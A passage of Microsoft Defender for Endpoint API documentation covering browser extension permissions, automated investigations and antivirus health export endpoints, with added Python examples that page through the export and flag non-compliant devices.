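    """Download every still-valid file, merge its records, and report what was skipped."""
    usable, expired = partition_urls(export, now)
    records: List[dict] = []
    for url in usable:
        records.extend(parse_export_file(download(url)))
    return {"records": records, "expired_urls": expired,
            "snapshot_age_hours": snapshot_age_hours(export, now)}
```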

See also
Get browser extensions permission info
Browser extensions assessment

Other related
Vulnerability management
Vulnerabilities in your organization


Get browser extensions permission information
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Want to experience Microsoft Defender Vulnerability Management? Learn more
about how you can sign up to the Microsoft Defender Vulnerability Management
public preview trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

API description
Retrieves a list of all the permissions requested by a specific browser extension. This is a
static data description and would mainly be used to enhance the data returned by the
Export browser extensions assessment API.

By combining these APIs you'll be able to see a description of the permissions requested
by the browser extensions that come up in the Export browser extensions assessment
results.

Supports OData V4 queries.

OData supported operators:
$filter on: id, name, description, cvssV3, publishedOn, severity, and updatedOn
properties.
$top with max value of 10,000.
$skip.

See examples at OData queries with Microsoft Defender for Endpoint.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Software.Read.All | 'Read Threat and Vulnerability Management software information'
Delegated (work or school account) | Software.Read | 'Read Threat and Vulnerability Management software information'

HTTP request
HTTP

GET /api/browserextensions/permissionsinfo

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK with the list of all permissions requested by a
browser extension in the body.

Example

Request example
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/browserextensions/permissionsinfo

Response example
Here is an example of the response.

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#BrowserExtension",
    "value": [
        {
            "value": [
                {
                    "key": "audioCapture",
                    "permissionName": "Capture audio from attached mic or webcam",
                    "description": "Capture audio from attached mic or webcam. Could be used to listen in on use."
                },
                {
                    "key": "app.window.fullscreen.overrideEsc",
                    "permissionName": "Prevent escape button from exiting fullscreen",
                    "description": "Can prevent escape button from exiting fullscreen."
                },
                {
                    "key": "browsingData",
                    "permissionName": "Clear browsing data",
                    "description": "Clears browsing data which could result in a forensics/logging issues."
                },
                {
                    "key": "content_security_policy",
                    "permissionName": "Can manipulate default Content Security Policy (CSP)",
                    "description": "CSP works as a block/allow listing mechanism for resources loaded or executed by your extensions. Can manipulate default CSP."
                }
            ]
        }
    ]
}

See also
Get browser extensions permission info
Browser extensions assessment

Other related
Vulnerability management
Vulnerabilities in your organization


Investigation resource type
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Represents an Automated Investigation entity in Defender for Endpoint.

For more information, see Overview of automated investigations.

Methods

Method | Return Type | Description
List Investigations | Investigation collection | Gets a collection of Investigation entities.
Get single Investigation | Investigation entity | Gets a single Investigation entity.
Start Investigation | Investigation entity | Starts an Investigation on a device.



Properties

Property | Type | Description
ID | String | Identity of the investigation entity.
startTime | DateTime Nullable | The date and time when the investigation was created.
endTime | DateTime Nullable | The date and time when the investigation was completed.
cancelledBy | String | The ID of the user/application that canceled that investigation.
State | Enum | The current state of the investigation. Possible values are: 'Unknown', 'Terminated', 'SuccessfullyRemediated', 'Benign', 'Failed', 'PartiallyRemediated', 'Running', 'PendingApproval', 'PendingResource', 'PartiallyInvestigated', 'TerminatedByUser', 'TerminatedBySystem', 'Queued', 'InnerFailure', 'PreexistingAlert', 'UnsupportedOs', 'UnsupportedAlertType', 'SuppressedAlert'.
statusDetails | String | Additional information about the state of the investigation.
machineId | String | The ID of the device on which the investigation is executed.
computerDnsName | String | The name of the device on which the investigation is executed.
triggeringAlertId | String | The ID of the alert that triggered the investigation.

JSON representation
JSON

{
    "id": "63004",
    "startTime": "2020-01-06T13:05:15Z",
    "endTime": null,
    "state": "Running",
    "cancelledBy": null,
    "statusDetails": null,
    "machineId": "e828a0624ed33f919db541065190d2f75e50a071",
    "computerDnsName": "desktop-test123",
    "triggeringAlertId": "da637139127150012465_1011995739"
}


List Investigations API
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a collection of Investigations.

Supports OData V4 queries.

The OData $filter query is supported on: startTime, id, state, machineId, and
triggeringAlertId properties.

$top with max value of 10,000

$skip

See examples at OData queries with Microsoft Defender for Endpoint.


Limitations
1. Maximum page size is 10,000.
2. Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Alert.Read.All | Read all alerts
Application | Alert.ReadWrite.All | Read and write all alerts
Delegated (work or school account) | Alert.Read | Read alerts
Delegated (work or school account) | Alert.ReadWrite | Read and write alerts

Note

When obtaining a token using user credentials, the user needs to have at least the
following role permission: View Data. For more information, see Create and manage
roles.

HTTP request
HTTP

GET https://api.securitycenter.microsoft.com/api/investigations

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns a 200 OK response code with a collection of
Investigation entities.

Example

Request example
Here's an example of a request to get all investigations:

HTTP

GET https://api.securitycenter.microsoft.com/api/investigations

Response example
Here's an example of the response:

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Investigations",
    "value": [
        {
            "id": "63017",
            "startTime": "2020-01-06T14:11:34Z",
            "endTime": null,
            "state": "Running",
            "cancelledBy": null,
            "statusDetails": null,
            "machineId": "a69a22debe5f274d8765ea3c368d00762e057b30",
            "computerDnsName": "desktop-gtrcon0",
            "triggeringAlertId": "da637139166940871892_-598649278"
        }
        ...
    ]
}


Get Investigation API
Article • 12/11/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves specific Investigation by its ID.
ID can be the investigation ID or the investigation triggering alert ID.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Alert.Read.All | 'Read all alerts'
Application | Alert.ReadWrite.All | 'Read and write all alerts'
Delegated (work or school account) | Alert.Read | 'Read alerts'
Delegated (work or school account) | Alert.ReadWrite | 'Read and write alerts'

Note

When obtaining a token using user credentials, the user needs to have at least the
following role permission: 'View Data' (see Create and manage roles for more
information).

HTTP request
HTTP

GET https://api.securitycenter.microsoft.com/api/investigations/{id}

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns a 200 OK response code with an Investigation entity.


Start Investigation API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Start automated investigation on a device.

See Overview of automated investigations for more information.

Limitations
1. Rate limitations for this API are 50 calls per hour.

Requirements for AIR

Your organization must have Defender for Endpoint (see Minimum requirements for
Microsoft Defender for Endpoint).
Currently, AIR only supports the following OS versions:

Windows Server 2019
Windows Server 2022
Windows 10, version 1709 (OS Build 16299.1085 with KB4493441) or later
Windows 10, version 1803 (OS Build 17134.704 with KB4493464) or later
Windows 10, version 1803 or later
Windows 11

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs

Permission type | Permission | Permission display name
Application | Alert.ReadWrite.All | 'Read and write all alerts'
Delegated (work or school account) | Alert.ReadWrite | 'Read and write alerts'

Note

When obtaining a token using user credentials:

The user needs to have at least the following role permission: 'Active
remediation actions' (see Create and manage roles for more information).
The user needs to have access to the device, based on device group settings
(see Create and manage device groups for more information).

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

POST https://api.security.microsoft.com/api/machines/{id}/startInvestigation

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.
Content-Type | string | application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

Parameter | Type | Description
Comment | String | Comment to associate with the action. Required.

Response
If successful, this method returns a 201 Created response code and the Investigation in the
response body.

Example

Request
Here is an example of the request.

HTTP

POST https://api.security.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/startInvestigation

JSON

{
    "Comment": "Test investigation"
}


Export device antivirus health details API methods and properties
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Export device antivirus health details API description
Retrieves a list of Microsoft Defender Antivirus device health details. This API has different
API calls (methods) to get different types of data. Because the amount of data can be
large, there are two ways it can be retrieved:

JSON response: The API pulls all data in your organization as JSON responses. This
method is best for small organizations with fewer than 100,000 devices. The response is
paginated, so you can use the @odata.nextLink field from the response to fetch the
next results.

Via files: This API solution enables pulling larger amounts of data faster and more
reliably, so it's recommended for large organizations with more than 100,000 devices.
This API pulls all data in your organization as download files. The response contains
URLs to download all the data from Azure Storage. This API enables you to
download all your data from Azure Storage as follows:
1. Call the API to get a list of download URLs with all your organization data.
2. Download all the files using the download URLs and process the data as you like.

Data that is collected using either method (JSON response or via files) is the current
snapshot of the current state. It doesn't contain historic data. To collect historic data,
customers must save the data in their own data storage.

Important

Currently, only the Antivirus Health JSON response is generally available. The Antivirus
Health API via files is currently only available in public preview.

Advanced Hunting custom query is currently only available in public preview, even if
the queries are still visible.

For Windows Server 2012 R2 and Windows Server 2016 to appear in device health
reports, these devices must be onboarded using the modern unified solution
package. For more information, see New functionality in the modern unified
solution for Windows Server 2012 R2 and 2016.

For information about using the Device health and antivirus compliance reporting
tool in the Microsoft 365 Security dashboard, see Device health and antivirus report
in Microsoft Defender for Endpoint.

1.1 Export device antivirus health details API methods

Method | Data type | Description
Microsoft Defender Antivirus health per device collection. See: 1.2 Export device antivirus health details API properties (JSON response) | Returns a table with an entry for every unique combination of DeviceId, ConfigurationId. | The API pulls all data in your organization as JSON responses. This method is best for small organizations with fewer than 100,000 devices. The response is paginated, so you can use the @odata.nextLink field from the response to fetch the next results.
Microsoft Defender Antivirus health per device collection. See: 1.3 Export device antivirus health details API properties (via files) | Returns a table with an entry for every unique combination of DeviceId, ConfigurationId. | This API solution enables pulling larger amounts of data faster and more reliably, so it's recommended for large organizations with more than 100,000 devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. This API enables you to download all your data from Azure Storage as follows: 1. Call the API to get a list of download URLs with all your organization data. 2. Download all the files using the download URLs and process the data as you like.

1.2 Limitations
Maximum page size: 200,000
Rate limitations for this API: 30 calls per minute and 1,000 calls per hour

1.3 Export device antivirus health details API properties (JSON response)

Note

The properties defined in the following table are listed alphabetically, by
property ID. When running this API, the resulting output will not necessarily be
returned in the same order listed in this table.
Note that rbacgroupname and Id are not supported filter operators.
Some additional columns might be returned in the response. These columns
can be temporary and might be removed; use only the documented columns.

Property (ID) | Data type | Description | Example of a returned value
avEngineUpdateTime | DateTimeOffset | Datetime when AV engine was last updated on device | "2022-08-04T12:44:02Z"
avEngineVersion | String | Antivirus engine version | "1.1.19400.3"
avIsEngineUpToDate | String | Up-to-date status of AV engine | "True", "False", "Unknown"
avIsPlatformUpToDate | String | Up-to-date status of AV platform | "True", "False", "Unknown"
avIsSignatureUpToDate | String | Up-to-date status of AV signature | "True", "False", "Unknown"
avMode | String | Antivirus mode. | Each mode will be a string typed integer value ranging from 0 to 5. Refer to the following mapping to see its value's meaning: '' = Other, '0' = Active, '1' = Passive, '2' = Disabled, '3' = Other, '4' = EDRBlocked, '5' = PassiveAudit
avPlatformUpdateTime | DateTimeOffset | Datetime when AV platform was last updated on device | "2022-08-04T12:44:02Z"
avPlatformVersion | String | Antivirus platform version | "4.18.2203.5"
avSignaturePublishTime | DateTimeOffset | Datetime when AV security intelligence build was released | "2022-08-04T12:44:02Z"
avSignatureUpdateTime | DateTimeOffset | Datetime when AV security intelligence was last updated on device | "2022-08-04T12:44:02Z"
avSignatureVersion | String | Antivirus security intelligence version | "1.371.1323.0"
computerDnsName | String | DNS name | "SampleDns"
dataRefreshTimestamp | DateTimeOffset | Datetime when data is refreshed for this report | "2022-08-04T12:44:02Z"
fullScanError | String | Error codes from full scan | "0x80508023"
fullScanResult | String | Full scan result of this device | "Completed", "Canceled", "Failed"
fullScanTime | DateTimeOffset | Datetime when full scan has completed | "2022-08-04T12:44:02Z"
id | String | Machine GUID | "30a8fa2826abf24d24379b23f8a44d471f00feab"
lastSeenTime | DateTimeOffset | Last seen datetime of this machine | "2022-08-04T12:44:02Z"
machineId | String | Machine GUID | "30a8fa2826abf24d24379b23f8a44d471f00feab"
osKind | String | Operating system kind | "windows", "mac", "linux"
osPlatform | String | Operating system major version name | Windows 10, macOs
osVersion | String | Operating system version | 10.0.18363.1440, 12.4.0.0
quickScanError | String | Error codes from quick scan | "0x80508023"
quickScanResult | String | Quick scan result of this device | "Completed", "Canceled", "Failed"
quickScanTime | DateTimeOffset | Datetime when quick scan has completed | "2022-08-04T12:44:02Z"
rbacGroupId | Long | Device group ID that this machine belongs to | 712
rbacGroupName | String | Name of device group that this machine belongs to | "SampleGroup"

1.4 Export device antivirus health details API properties (via files)

Important

Information in this section relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Note

The files are gzip compressed & in multiline Json format.
The download URLs are only valid for 3 hours; otherwise you can use the parameter.
For maximum download speed of your data, you can make sure you are downloading from the same Azure region that your data resides.
Each record is approximately 1KB of data. You should take this into account when choosing the correct pageSize parameter for you.
Some additional columns might be returned in the response. These columns are temporary and might be removed, please use only the documented columns.

Property (ID) | Data type | Description | Example of a returned value
Export files | array[string] | A list of download URLs for files holding the current snapshot of the organization. | ["https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...1", "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...2"]
GeneratedTime | String | The time that the export was generated. | 2022-05-20T08:00:00Z

Note

In each of the Export files a property "DeviceGatheredInfo" containing the data about Antivirus information can be found. Each of its attributes can provide you with information on the device's health and its status.

See also
Export device antivirus health report
Device health and compliance reporting

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.



Export device antivirus health report
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

This API has two methods to retrieve Microsoft Defender Antivirus device antivirus health details:

Method one: 1 Export health reporting (JSON response). This method pulls all data in your organization as JSON responses. It is best for small organizations with fewer than 100-K devices. The response is paginated, so you can use the @odata.nextLink field from the response to fetch the next results.

Method two: 2 Export health reporting (via files). This method enables pulling larger amounts of data faster and more reliably, so it's recommended for large organizations with more than 100-K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. This API enables you to download all your data from Azure Storage as follows:
1. Call the API to get a list of download URLs with all your organization data.
2. Download all the files using the download URLs and process the data as you like.

Data that is collected using either method ('JSON response' or 'via files') is the current snapshot of the current state. It doesn't contain historic data. To collect historic data, customers must save the data in their own data storages. See Export device health details API methods and properties.

Important

Currently, only the Antivirus Health JSON Response is generally available. Antivirus Health API via files is currently only available in public preview.

Advanced Hunting custom query is currently only available in public preview, even if the queries are still visible.

Important

For Windows Server 2012 R2 and Windows Server 2016 to appear in device health reports, these devices must be onboarded using the modern unified solution package. For more information, see New functionality in the modern unified solution for Windows Server 2012 R2 and 2016.

Note

For information about using the Device health and antivirus compliance reporting tool in the Microsoft 365 Security dashboard, see: Device health and antivirus compliance report in Microsoft Defender for Endpoint.

1 Export health reporting (JSON response)

1.1 API method description
This API retrieves a list of Microsoft Defender Antivirus device antivirus health details. Returns a table with an entry for every unique combination of:

DeviceId
Device name
AV mode
Up-to-date status
Scan results

1.1.1 Limitations

Maximum page size is 200,000.
Rate limitations for this API are 30 calls per minute and 1000 calls per hour.

OData supported operators

$filter on: machineId, computerDnsName, osKind, osPlatform, osVersion, avMode, avSignatureVersion, avEngineVersion, avPlatformVersion, quickScanResult, quickScanError, fullScanResult, fullScanError, avIsSignatureUpToDate, avIsEngineUpToDate, avIsPlatformUpToDate, rbacGroupId
$top with max value of 10,000.
$skip

Important

Note that rbacgroupname and Id are not supported filter operators.

1.2 Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Machine.Read.All | 'Read all machine profiles'
Delegated (work or school account) | Machine.Read | 'Read machine information'

1.3 URL (HTTP request)
HTTP

GET /api/deviceavinfo

1.3.1 Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

1.3.2 Request body
Empty

1.3.3 Response
If successful, this method returns 200 OK with a list of device health details.

1.4 Parameters
Default page size is 20.
See examples at OData queries with Microsoft Defender for Endpoint.

1.5 Properties
See: 1.3 Export device antivirus health details API properties (JSON response).

Supports OData V4 queries.

1.6 Example

Request example

Here's an example request:

HTTP
GET https://api.securitycenter.microsoft.com/api/deviceavinfo

Response example
Here's an example response:

JSON
{
"@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#DeviceAvInfo",
"value": [{
"id": "Sample Guid",
"machineId": "Sample Machine Guid",
"computerDnsName": "appblockstg1",
"osKind": "windows",
"osPlatform": "Windows10",
"osVersion": "10.0.19044.1865",
"avMode": "0",
"avSignatureVersion": "1.371.1279.0",
"avEngineVersion": "1.1.19428.0",
"avPlatformVersion": "4.18.2206.108",
"lastSeenTime": "2022-08-02T19:40:45Z",
"quickScanResult": "Completed",
"quickScanError": "",
"quickScanTime": "2022-08-02T18:40:15.882Z",
"fullScanResult": "",
"fullScanError": "",
"fullScanTime": null,
"dataRefreshTimestamp": "2022-08-02T21:16:23Z",
"avEngineUpdateTime": "2022-08-02T00:03:39Z",
"avSignatureUpdateTime": "2022-08-02T00:03:39Z",
"avPlatformUpdateTime": "2022-06-20T16:59:35Z",
"avIsSignatureUpToDate": "True",
"avIsEngineUpToDate": "True",
"avIsPlatformUpToDate": "True",
"avSignaturePublishTime": "2022-08-02T00:03:39Z",
"rbacGroupName": "TVM1",
"rbacGroupId": 4415
},
...
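The JSON-response method above is paginated, and the avMode and up-to-date fields are string-typed, so a client has to follow @odata.nextLink to the end and decode the values before it can say which devices are out of compliance. The script below is an added example (not Microsoft's code and not from this article): `fetch_json` is a hypothetical stand-in for an authenticated GET with a bearer token, the pages are constructed sample data in the documented shape, and the `pageSize` query parameter is assumed.

```python
"""Walk the Defender for Endpoint device AV health export (JSON-response method)
page by page and reduce it to a compliance report.

Added example, not Microsoft's code. `fetch_json` is a hypothetical callable
standing in for an authenticated HTTP GET (bearer token in the Authorization
header); the pages below are constructed in the documented response shape so
the script runs offline. The pageSize query parameter is an assumption.
"""
from typing import Callable, Dict, Iterator, List

BASE_URL = "https://api.securitycenter.microsoft.com"

# avMode is a string-typed integer; the mapping is the one in the property table.
AV_MODE = {
    "": "Other",
    "0": "Active",
    "1": "Passive",
    "2": "Disabled",
    "3": "Other",
    "4": "EDRBlocked",
    "5": "PassiveAudit",
}


def iter_device_av_info(fetch_json: Callable[[str], dict], page_size: int = 10000) -> Iterator[dict]:
    """Yield every record, following @odata.nextLink until the last page omits it."""
    url = f"{BASE_URL}/api/deviceavinfo?pageSize={page_size}"
    while url:
        page = fetch_json(url)
        for record in page.get("value", []):
            yield record
        url = page.get("@odata.nextLink")  # None on the final page


def assess_device(record: dict) -> List[str]:
    """Reasons a device is not in a healthy AV state; an empty list means healthy."""
    findings = []
    mode = AV_MODE.get(record.get("avMode", ""), "Other")
    if mode != "Active":
        findings.append(f"avMode={mode}")
    for field in ("avIsSignatureUpToDate", "avIsEngineUpToDate", "avIsPlatformUpToDate"):
        if record.get(field) != "True":  # "False" and "Unknown" both need attention
            findings.append(f"{field}={record.get(field)}")
    for scan in ("quickScan", "fullScan"):
        result = record.get(f"{scan}Result") or ""
        error = record.get(f"{scan}Error") or ""
        if result in ("Failed", "Canceled") or error:
            findings.append(f"{scan}: {result or 'n/a'} {error}".rstrip())
    return findings


def summarize(fetch_json: Callable[[str], dict]) -> Dict[str, List[str]]:
    """computerDnsName -> findings, for every device that is not healthy."""
    report: Dict[str, List[str]] = {}
    for rec in iter_device_av_info(fetch_json):
        findings = assess_device(rec)
        if findings:
            report[rec["computerDnsName"]] = findings
    return report


# --- constructed sample pages (shape follows the documented response) ----------
_PAGE1 = f"{BASE_URL}/api/deviceavinfo?pageSize=10000"
_PAGE2 = f"{BASE_URL}/api/deviceavinfo?pageSize=10000&$skiptoken=PAGE2"  # constructed token
SAMPLE_PAGES = {
    _PAGE1: {
        "@odata.context": f"{BASE_URL}/api/$metadata#DeviceAvInfo",
        "value": [
            {"computerDnsName": "healthy-01", "avMode": "0", "avIsSignatureUpToDate": "True",
             "avIsEngineUpToDate": "True", "avIsPlatformUpToDate": "True",
             "quickScanResult": "Completed", "quickScanError": "", "fullScanResult": "", "fullScanError": ""},
            {"computerDnsName": "passive-02", "avMode": "1", "avIsSignatureUpToDate": "True",
             "avIsEngineUpToDate": "True", "avIsPlatformUpToDate": "True",
             "quickScanResult": "Completed", "quickScanError": "", "fullScanResult": "", "fullScanError": ""},
        ],
        "@odata.nextLink": _PAGE2,
    },
    _PAGE2: {
        "@odata.context": f"{BASE_URL}/api/$metadata#DeviceAvInfo",
        "value": [
            {"computerDnsName": "stale-03", "avMode": "0", "avIsSignatureUpToDate": "False",
             "avIsEngineUpToDate": "True", "avIsPlatformUpToDate": "Unknown",
             "quickScanResult": "Failed", "quickScanError": "0x80508023", "fullScanResult": "", "fullScanError": ""},
        ],
    },
}


def sample_fetch(url: str) -> dict:
    """Stand-in for the authenticated GET: looks the URL up in the constructed pages."""
    return SAMPLE_PAGES[url]


if __name__ == "__main__":
    for name, why in summarize(sample_fetch).items():
        print(name, "->", "; ".join(why))
```

Treating "Unknown" the same as "False" is deliberate: a device the service cannot vouch for is not one you can report as compliant, and the rate limits (30 calls per minute) make it cheap to re-query such devices separately rather than re-pull the whole export.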

2 Export health reporting (via files)

Important

Information in this section relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

2.1 API method description

This API response contains all the data of Antivirus health and status per device. Returns a table with an entry for every unique combination of:

DeviceId
Device name
AV mode
Up-to-date status
Scan results

2.1.2 Limitations
Maximum page size is 200,000.
Rate limitations for this API are 30 calls per minute and 1000 calls per hour.

2.2 Permissions
One of the following permissions is required to call this API.

Permission type | Permission | Permission display name
Application | Vulnerability.Read.All | 'Read "threat and vulnerability management" vulnerability information'
Delegated (work or school account) | Vulnerability.Read | 'Read "threat and vulnerability management" vulnerability information'

To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

2.3 URL
HTTP

GET /api/machines/InfoGatheringExport

2.4 Parameters
sasValidHours: The number of hours that the download URLs will be valid for (Maximum 24 hours).

2.5 Properties
See: 1.4 Export device antivirus health details API properties (via files).

2.6 Examples

2.6.1 Request example

Here's an example request:

HTTP

GET https://api-us.securitycenter.contoso.com/api/machines/InfoGatheringExport

2.6.2 Response example

Here's an example response:

JSON

{
"@odata.context": "https://api-us.securitycenter.windows.com/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesResponse",
"exportFiles": [
"https://tvmexportexternalprdeus.blob.core.windows.net/temp-../2022-08-02/2201/InfoGatheringExport/json/OrgId=../_RbacGroupId=../part-00055-12fc2fcd-8f56-4e09-934f-e8efe7ce74a0.c000.json.gz?sv=2020-08-04&st=2022-08-02T22%3A47%3A11Z&se=2022-08-03T01%3A47%3A11Z&sr=b&sp=r&sig=..",
"https://tvmexportexternalprdeus.blob.core.windows.net/temp-../2022-08-02/2201/InfoGatheringExport/json/OrgId=../_RbacGroupId=../part-00055-12fc2fcd-8f56-4e09-934f-e8efe7ce74a0.c000.json.gz?sv=2020-08-04&st=2022-08-02T22%3A47%3A11Z&se=2022-08-03T01%3A47%3A11Z&sr=b&sp=r&sig=.."
],
"generatedTime": "2022-08-02T22:01:00Z"
}
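The via-files method hands back time-limited Azure Storage SAS URLs (the `se=` query parameter is the signed expiry, three hours after `st=` in the example above) pointing at gzip-compressed files with one JSON object per line. The following consumer is an added example, not Microsoft's code: it drops URLs whose SAS token has already expired, streams each file through gzip, and pulls the "DeviceGatheredInfo" object out of every record. `download` is a hypothetical callable returning the bytes behind a SAS URL; the export response, the gzip blobs and the attribute names inside DeviceGatheredInfo are constructed, since this article lists only the outer properties.

```python
"""Consume the Defender for Endpoint "via files" AV health export.

Added example, not Microsoft's code. `download` is a hypothetical callable that
returns the raw bytes behind a SAS URL (the signature travels in the URL, so no
bearer token is needed for that GET). The export response, the gzip blobs and
the attribute names inside DeviceGatheredInfo are constructed so the script
runs offline.
"""
import gzip
import io
import json
from datetime import datetime, timezone
from typing import Callable, Iterator, List, Optional
from urllib.parse import parse_qs, urlparse


def sas_expiry(url: str) -> Optional[datetime]:
    """Read the 'se' (signed expiry) parameter of an Azure Storage SAS URL, or None."""
    se = parse_qs(urlparse(url).query).get("se")
    if not se:
        return None
    # SAS times are ISO 8601 UTC, e.g. 2022-08-03T01:47:11Z (already percent-decoded by parse_qs)
    return datetime.strptime(se[0], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def usable_urls(export: dict, now: datetime) -> List[str]:
    """Keep only download URLs whose SAS token is still valid at `now`."""
    keep = []
    for url in export.get("exportFiles", []):
        exp = sas_expiry(url)
        if exp is not None and exp > now:
            keep.append(url)
    return keep


def iter_records(blob: bytes) -> Iterator[dict]:
    """Decode a gzip-compressed file holding one JSON object per line."""
    with gzip.GzipFile(fileobj=io.BytesIO(blob)) as fh:
        for raw in fh:
            line = raw.strip()
            if line:
                yield json.loads(line)


def collect_av_info(export: dict, download: Callable[[str], bytes], now: datetime) -> List[dict]:
    """Flatten DeviceGatheredInfo from every still-valid export file into one row per device."""
    rows = []
    for url in usable_urls(export, now):
        for rec in iter_records(download(url)):
            info = rec.get("DeviceGatheredInfo") or {}
            rows.append({"deviceId": rec.get("DeviceId"), **info})
    return rows


# --- constructed sample data ---------------------------------------------------
def _gz(objs: List[dict]) -> bytes:
    """Build a multiline-JSON gzip blob the way the export files are laid out."""
    buf = io.BytesIO()
    with gzip.GzipFile(fileobj=buf, mode="wb") as fh:
        for obj in objs:
            fh.write((json.dumps(obj) + "\n").encode())
    return buf.getvalue()


# Signatures are placeholders; only the 'se' parameter matters to this example.
VALID_URL = "https://example.blob.core.windows.net/part-0.json.gz?sv=2020-08-04&se=2022-08-03T01%3A47%3A11Z&sr=b&sp=r&sig=placeholder"
EXPIRED_URL = "https://example.blob.core.windows.net/part-1.json.gz?sv=2020-08-04&se=2022-08-02T01%3A00%3A00Z&sr=b&sp=r&sig=placeholder"

SAMPLE_EXPORT = {"exportFiles": [VALID_URL, EXPIRED_URL], "generatedTime": "2022-08-02T22:01:00Z"}
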